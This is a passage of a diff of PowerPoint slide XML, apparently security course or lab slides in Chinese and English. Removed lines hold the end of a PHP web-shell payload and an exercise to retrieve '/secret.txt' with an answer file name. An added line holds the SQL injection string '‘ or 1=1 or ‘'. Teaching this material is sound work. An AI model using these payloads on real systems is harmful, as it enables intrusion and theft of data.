-              <a:rPr lang="en-CA" dirty="0" err="1">
-                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              </a:rPr>
-              <a:t>cmd</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0">
-                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              </a:rPr>
-              <a:t>’]); ?&gt;</a:t>
+              <a:t>‘ or 1=1 or ‘</a:t>
             </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:endParaRPr lang="en-CA" dirty="0">
-              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
-                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              </a:rPr>
-              <a:t>請抓出位於 </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" altLang="zh-TW" dirty="0">
-                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              </a:rPr>
-              <a:t>/secret.txt </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
-                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              </a:rPr>
-              <a:t>的機密資料</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
-              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
-                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              </a:rPr>
-              <a:t>5487580.txt</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:endParaRPr lang="en-CA" dirty="0">
-              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
             </a:endParaRPr>
           </a:p>
         </p:txBody>
@@ -5383,13 +5677,20 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2359365455"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1733715017"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
   <p:clrMapOvr>
     <a:masterClrMapping/>
   </p:clrMapOvr>
+  <p:timing>
+    <p:tnLst>
+      <p:par>
+        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
+      </p:par>
+    </p:tnLst>
+  </p:timing>
 </p:sld>
 </file>
 

</xml_diff>